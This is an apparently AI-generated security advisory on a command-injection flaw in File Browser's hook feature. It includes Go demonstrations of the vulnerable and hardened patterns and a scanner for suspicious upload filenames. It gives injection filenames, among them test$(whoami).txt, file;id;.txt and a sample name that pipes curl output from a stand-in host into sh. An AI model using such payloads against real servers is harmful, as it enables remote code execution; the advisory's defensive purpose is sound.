CVE-2026-35585 Overview
File Browser is a web-based file management interface that lets users upload, delete, preview, rename, and edit files within a configured directory. An OS command injection vulnerability, rated critical, has been reported in the hook system of File Browser versions 2.0.0 through 2.63.1. Hooks are administrator-defined shell commands that run on file events such as upload, rename, and delete, and the hook template may reference variables such as $FILE and $USERNAME. The implementation substitutes these variables with Go's os.Expand and hands the resulting string to a shell without quoting or escaping the substituted values. Because $FILE is derived from a user-supplied filename, an attacker with file write permission can choose a name containing shell metacharacters; when the hook fires, the shell parses those characters as syntax and executes attacker-chosen commands, yielding Remote Code Execution (RCE) as the File Browser process.
Critical Impact
An attacker with file write permission can achieve Remote Code Execution on the server by uploading files with specially crafted filenames containing shell metacharacters that are executed when hooks process file events.
Affected Products
- File Browser versions 2.0.0 through 2.63.1
- Only installations with custom hooks enabled are exposed (hooks have been disabled by default since v2.33.8, so an instance on those versions is affected only if an administrator turned them on)
Discovery Timeline
- 2026-04-07 - CVE-2026-35585 published to NVD
- 2026-04-08 - Last updated in NVD database
Technical Details for CVE-2026-35585
Vulnerability Analysis
This vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), commonly known as OS Command Injection. The flaw exists in File Browser's hook system, which is designed to execute shell commands in response to file operations. The implementation uses Go's os.Expand function to perform variable substitution for dynamic values like filenames and usernames without any sanitization or escaping of shell metacharacters.
When an administrator configures hooks to respond to file events (upload, rename, delete), the hook command template includes variables that are expanded at runtime. Since these variables can contain user-controlled data such as filenames, an attacker can inject shell commands by including metacharacters like semicolons (;), backticks, or command substitution syntax ($(...)) within filenames.
The attack requires file write permission on the File Browser instance, meaning the attacker must have some level of authenticated access. However, once this prerequisite is met, the vulnerability allows complete command execution with the privileges of the File Browser server process.
Root Cause
The root cause is the unsafe use of os.Expand to splice user-controlled values such as $FILE and $USERNAME into a command string that is subsequently passed to a shell. os.Expand itself performs a single textual substitution and does not re-expand what the mapping returns; the problem is that the expanded string is then parsed by the shell as one command line, so a filename containing ;, |, backticks or $(...) is tokenised as command separators, pipes or substitutions rather than as data. No escaping, quoting or validation is applied at either step.
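The following Go program is an added illustration of the pattern the Root Cause section describes; it is not File Browser's own code. It models a hook template that references $FILE and $USERNAME, expands it with os.Expand and runs the result through sh -c (the vulnerable shape), and beside it the hardened shape in which the template is left untouched and the values are supplied through the environment so the shell expands them as data. The hookVars type, the sampleHook template and the filename test$(echo pwned).txt are constructed for the demonstration.

```go
package main

import (
	"bytes"
	"fmt"
	"os"
	"os/exec"
	"strings"
)

// hookVars holds the values a hook template may reference. The names follow
// the variables the advisory text mentions ($FILE, $USERNAME); the struct and
// helpers below are illustrative, not File Browser's own types.
type hookVars struct {
	File     string // uploaded filename or path: attacker-controlled
	Username string
	Trigger  string
}

// lookup is the mapping function handed to os.Expand; unknown names become "".
func (v hookVars) lookup(name string) string {
	switch name {
	case "FILE":
		return v.File
	case "USERNAME":
		return v.Username
	case "TRIGGER":
		return v.Trigger
	}
	return ""
}

// buildVulnerable models the flawed pattern: expand the template as text,
// then hand the result to a shell, which parses the whole string again.
// os.Expand is a single pass and does not re-expand what lookup returns;
// the injection happens when sh re-tokenises the expanded string.
func buildVulnerable(template string, v hookVars) *exec.Cmd {
	expanded := os.Expand(template, v.lookup) // no quoting or escaping
	return exec.Command("sh", "-c", expanded)
}

// buildSafe leaves the template untouched and supplies the values through the
// environment. The shell expands $FILE as data and never re-parses the value
// as syntax, so metacharacters in a filename stay literal. Hook authors still
// need to write "$FILE" (quoted) to avoid word splitting and globbing.
func buildSafe(template string, v hookVars) *exec.Cmd {
	cmd := exec.Command("sh", "-c", template)
	cmd.Env = append(os.Environ(),
		"FILE="+v.File,
		"USERNAME="+v.Username,
		"TRIGGER="+v.Trigger,
	)
	return cmd
}

// run executes a hook and returns its trimmed combined output.
func run(cmd *exec.Cmd) (string, error) {
	var out bytes.Buffer
	cmd.Stdout = &out
	cmd.Stderr = &out
	err := cmd.Run()
	return strings.TrimSpace(out.String()), err
}

// sampleHook and sampleVars are constructed inputs: a plausible upload hook
// and a filename carrying a harmless stand-in for a payload.
const sampleHook = `echo "upload: $FILE by $USERNAME"`

var sampleVars = hookVars{File: "test$(echo pwned).txt", Username: "alice", Trigger: "upload"}

func main() {
	vulnOut, _ := run(buildVulnerable(sampleHook, sampleVars))
	safeOut, _ := run(buildSafe(sampleHook, sampleVars))
	fmt.Println("vulnerable:", vulnOut) // upload: testpwned.txt by alice
	fmt.Println("hardened:  ", safeOut) // upload: test$(echo pwned).txt by alice
}
```

Running it shows the difference in one line each: the vulnerable build prints testpwned.txt because the shell executed $(echo pwned), while the hardened build prints the filename verbatim. The environment-variable approach keeps the administrator-facing $FILE syntax; passing the values as positional arguments to sh -c and referencing them as "$1" would be equally safe.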
Attack Vector
The attack is network-based and requires the attacker to have authenticated access with file write permissions. The exploitation flow involves:
- The attacker authenticates to a File Browser instance that has hooks configured for file events
- The attacker uploads a file whose name contains shell metacharacters (e.g., test$(whoami).txt, or file;id;.txt, where the ; terminates the administrator's command and starts the attacker's); a single filename component cannot contain a slash, so payloads that need a URL or path are typically assembled inside $( ) or backticks rather than written literally
- When the upload hook triggers, the filename is expanded into the hook command without sanitization
- The shell interprets the metacharacters, executing the injected commands with the server's privileges
The vulnerability specifically targets the variable substitution mechanism. For detailed technical analysis and proof-of-concept information, see the GitHub Security Advisory GHSA-jvpw-637p-h3pw.
Detection Methods for CVE-2026-35585
Indicators of Compromise
- Filenames containing shell metacharacters such as ;, |, $(), backticks, or && in File Browser upload directories
- Unexpected process spawning by the File Browser server process
- Unusual network connections originating from the File Browser application
- Evidence of command execution in system logs correlating with file upload times
Detection Strategies
- Monitor File Browser logs for file operations with suspicious filenames containing shell metacharacters
- Implement file system monitoring to detect unusual file creations with special characters
- Deploy endpoint detection rules to identify child process spawning from File Browser executables
- Review hook configurations to identify potentially vulnerable setups using $FILE or $USERNAME variables
Monitoring Recommendations
- Enable verbose logging in File Browser to capture all file operation events
- Configure SIEM rules to alert on filenames containing common command injection patterns
- Monitor process trees for unexpected shell command execution originating from the File Browser process
- Implement network monitoring to detect data exfiltration attempts from compromised servers
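The following Go program is an added example, not part of the advisory or of File Browser, that implements the filename audit the Detection Strategies and Monitoring Recommendations call for (and the upload-directory audit listed under Immediate Actions below). It walks an upload root and reports every file or directory whose name contains characters a POSIX shell would treat as syntax. The metacharacter set, the Finding type and the sample directory tree it builds are constructed for the demonstration; bare parentheses are deliberately not flagged, since browser-generated names such as "report (1).pdf" would otherwise drown the results in noise.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"sort"
	"strings"
)

// Finding records one suspicious name under the scanned upload root.
type Finding struct {
	Path  string // path relative to the scanned root
	Chars string // distinct metacharacters found, in order of appearance
}

// shellMeta lists characters that a POSIX shell interprets as syntax when a
// filename is spliced unquoted into a command string: command separators,
// pipes, substitution ($..., `...`), redirection, escaping and newline.
// Parentheses alone are excluded to keep "file (1).ext" names out of the list.
const shellMeta = ";|&$`<>\\\n"

// suspiciousName reports whether name contains shell metacharacters and
// returns the distinct ones found.
func suspiciousName(name string) (bool, string) {
	var hits []rune
	for _, r := range name {
		if strings.ContainsRune(shellMeta, r) && !strings.ContainsRune(string(hits), r) {
			hits = append(hits, r)
		}
	}
	return len(hits) > 0, string(hits)
}

// scanUploadDir walks root and returns findings sorted by path. Directory
// names are checked as well, because rename and delete hooks receive paths,
// not only the basename of an uploaded file.
func scanUploadDir(root string) ([]Finding, error) {
	var findings []Finding
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, walkErr error) error {
		if walkErr != nil {
			return walkErr
		}
		if p == root {
			return nil
		}
		if ok, chars := suspiciousName(d.Name()); ok {
			rel, _ := filepath.Rel(root, p)
			findings = append(findings, Finding{Path: rel, Chars: chars})
		}
		return nil
	})
	sort.Slice(findings, func(i, j int) bool { return findings[i].Path < findings[j].Path })
	return findings, err
}

// buildSampleTree creates a constructed upload directory mixing benign and
// suspicious names so the scanner can run offline. The caller removes it.
func buildSampleTree() (string, error) {
	root, err := os.MkdirTemp("", "fb-audit-")
	if err != nil {
		return "", err
	}
	names := []string{
		"report.pdf",                         // benign
		"quarterly (1).xlsx",                 // benign: bare parentheses not flagged
		"test$(whoami).txt",                  // command substitution
		"file;curl example.invalid|sh;.txt", // separators and a pipe
		"notes`id`.md",                       // backtick substitution
	}
	for _, n := range names {
		if err := os.WriteFile(filepath.Join(root, n), []byte("x"), 0o600); err != nil {
			return "", err
		}
	}
	return root, nil
}

func main() {
	root, err := buildSampleTree()
	if err != nil {
		fmt.Println("setup:", err)
		return
	}
	defer os.RemoveAll(root)

	findings, err := scanUploadDir(root)
	if err != nil {
		fmt.Println("scan:", err)
		return
	}
	for _, f := range findings {
		fmt.Printf("%-40s metacharacters: %q\n", f.Path, f.Chars)
	}
}
```

Point scanUploadDir at the real File Browser root (or at each user's scope) for the one-off audit; for continuous monitoring, feed the same suspiciousName check the filename field of File Browser's access logs or your SIEM's file-creation events. A hit is a lead, not proof of compromise: correlate it with the hook configuration and with child processes of the File Browser server at the time the file appeared.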
How to Mitigate CVE-2026-35585
Immediate Actions Required
- Disable all custom hooks on File Browser installations running versions 2.0.0 through 2.63.1; with hooks off, the vulnerable expansion is never reached
- Upgrade to a release outside the affected range, checking GHSA-jvpw-637p-h3pw for the current fixed-version information; hooks have been disabled by default since 2.33.8, but that default does not protect an instance on which an administrator has re-enabled them
- Review any hook configuration that must stay in place and remove commands that reference user-controllable variables such as $FILE or $USERNAME
- Audit file upload directories for filenames containing shell metacharacters, which may indicate exploitation attempts
- Restrict file write permission to trusted users only, since it is the precondition for the attack
Patch Information
The File Browser maintainers have addressed this vulnerability by disabling the hook feature by default for all installations from version 2.33.8 onwards, including existing installations. Note that a disabled-by-default setting removes the attack surface only while hooks stay off: the affected range extends through 2.63.1, so an instance on any of those versions where an administrator has turned hooks back on is still exposed, because the variable expansion itself is unchanged. Organizations should upgrade to the latest available version, verify after the upgrade that hooks are disabled, and keep them disabled unless absolutely necessary. For additional details, refer to GitHub Issue #5199 and the GitHub Security Advisory GHSA-jvpw-637p-h3pw.
Workarounds
- Disable all hooks in the File Browser configuration until an upgrade can be performed
- Implement filename validation at the application or reverse proxy level to reject names containing shell metacharacters; treat this as defence in depth rather than a fix, since a denylist must cover every path that reaches a hook (rename destinations as well as uploads) and every encoding the request path may use
- Run File Browser in a containerized environment with minimal privileges to limit the impact of command execution
- Use Web Application Firewall (WAF) rules to block file uploads with suspicious filename patterns
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

